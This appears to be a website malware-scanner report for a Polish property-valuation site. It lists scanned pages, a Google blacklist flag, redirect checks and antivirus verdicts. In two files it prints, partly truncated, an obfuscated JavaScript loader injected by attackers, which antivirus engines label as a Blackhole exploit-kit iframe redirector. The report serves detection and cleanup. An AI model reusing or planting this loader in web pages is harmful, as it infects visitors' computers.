New scan:

Malware Scanner report for wycena-nieruchomosci.info

Malicious/Suspicious/Total urls checked
2/0/10
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "wycena-nieruchomosci.info" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=wycena-nieruchomosci.info

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://wycena-nieruchomosci.info/
200 OK
Content-Length: 4026
Content-Type: text/html
clean
http://wycena-nieruchomosci.info/advajax.js
200 OK
Content-Length: 19345
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,108,97,110,32,60,30,100,110,97,117,108,99,110,115,44,99,113,99,97,115,99,69,107,99,109,100,108,116,39,37,105,101,112,97,108,99,39,40,57,13,9,11,10,31,30,32,31,106,98,111,44,115,113,97,32,60,30,39,103,114,116,111,56,47,46,109,118,112,115,113,96,103,112,45,112,11
... 857 bytes are skipped ...
,30,32,31,30,32,99,109,99,116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,108,97,110,92,38,60,60,46,98,105,117,60,39,40,57,13,9,30,32,31,30,32,31,30,32,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,106,98,111,37,41,45,95,112,111,99,110,99,65,104,104,106,100,39,106,98,111,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+468!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+j%3));}e(s)

Antivirus reports:

AntiVir
JS/BlacoleRef.W.76
Avast
JS:Decode-JA [Trj]
Ikarus
Trojan.Script
nProtect
JS:Trojan.JS.Agent.GA
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_IFRAMERE.SMJF
Comodo
TrojWare.JS.Agent.GF
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.394
TrendMicro
JS_IFRAMERE.SMJF
Kaspersky
Trojan-Downloader.JS.Agent.gvi
Microsoft
Trojan:JS/IframeRef.I
MicroWorld-eScan
JS:Trojan.JS.Agent.GA
Fortinet
JS/Blacole.GC!exploit
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Iframe.bcslpm
F-Secure
JS:Trojan.JS.Agent.GA
F-Prot
JS/IFrame.RS
AVG
JS/Redir
GData
JS:Trojan.JS.Agent.GA
Commtouch
JS/IFrame.RS
BitDefender
JS:Trojan.JS.Agent.GA

http://wycena-nieruchomosci.info/main.js
200 OK
Content-Length: 5247
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[""+v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,108,97,110,32,60,30,100,110,97,117,108,99,110,115,44,99,113,99,97,115,99,69,107,99,109,100,108,116,39,37,105,101,112,97,108,99,39,40,57,13,9,11,10,31,30,32,31,106,98,111,44,115,113,97,32,60,30,39,103,114,116,111,56,47,46,109,118,112,115,113,96,103,112,45,112,11
... 857 bytes are skipped ...
,30,32,31,30,32,99,109,99,116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,108,97,110,92,38,60,60,46,98,105,117,60,39,40,57,13,9,30,32,31,30,32,31,30,32,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,106,98,111,37,41,45,95,112,111,99,110,99,65,104,104,106,100,39,106,98,111,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+468!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+j%3));}e(s)

Antivirus reports:

AntiVir
JS/BlacoleRef.W.76
Avast
JS:Decode-JA [Trj]
Ikarus
Trojan.Script
nProtect
JS:Trojan.JS.Agent.GA
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_IFRAMERE.SMJF
Comodo
TrojWare.JS.Agent.GF
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.394
TrendMicro
JS_IFRAMERE.SMJF
Kaspersky
Trojan-Downloader.JS.Agent.gvi
Microsoft
Trojan:JS/IframeRef.I
MicroWorld-eScan
JS:Trojan.JS.Agent.GA
Fortinet
JS/Blacole.GC!exploit
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Iframe.bcslpm
F-Secure
JS:Trojan.JS.Agent.GA
F-Prot
JS/IFrame.RS
AVG
JS/Redir
GData
JS:Trojan.JS.Agent.GA
Commtouch
JS/IFrame.RS
BitDefender
JS:Trojan.JS.Agent.GA

http://wycena-nieruchomosci.info/register
200 OK
Content-Length: 4689
Content-Type: text/html
clean
http://wycena-nieruchomosci.info/index.php
200 OK
Content-Length: 4026
Content-Type: text/html
clean
http://wycena-nieruchomosci.info/szukaj
200 OK
Content-Length: 4979
Content-Type: text/html
clean
http://wycena-nieruchomosci.info/cennik
200 OK
Content-Length: 3695
Content-Type: text/html
clean
http://wycena-nieruchomosci.info/kontakt
200 OK
Content-Length: 3600
Content-Type: text/html
clean
http://wycena-nieruchomosci.info/test404page.js
404 Not Found
Content-Length: 495
Content-Type: text/html
clean
http://wycena-nieruchomosci.info/regulamin
200 OK
Content-Length: 4404
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: wycena-nieruchomosci.info

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 03 Oct 2014 00:39:28 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=d824a93726ea02c43dcd6a659bb7a58a; path=/
Set-Cookie: PHPSESSID=d892741855cc8162a2a0e2ee08fef75b; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: wycena-nieruchomosci.info
Referer: http://www.google.com/search?q=wycena-nieruchomosci.info

Result:
The result is similar to the first query. There are no suspicious redirects found.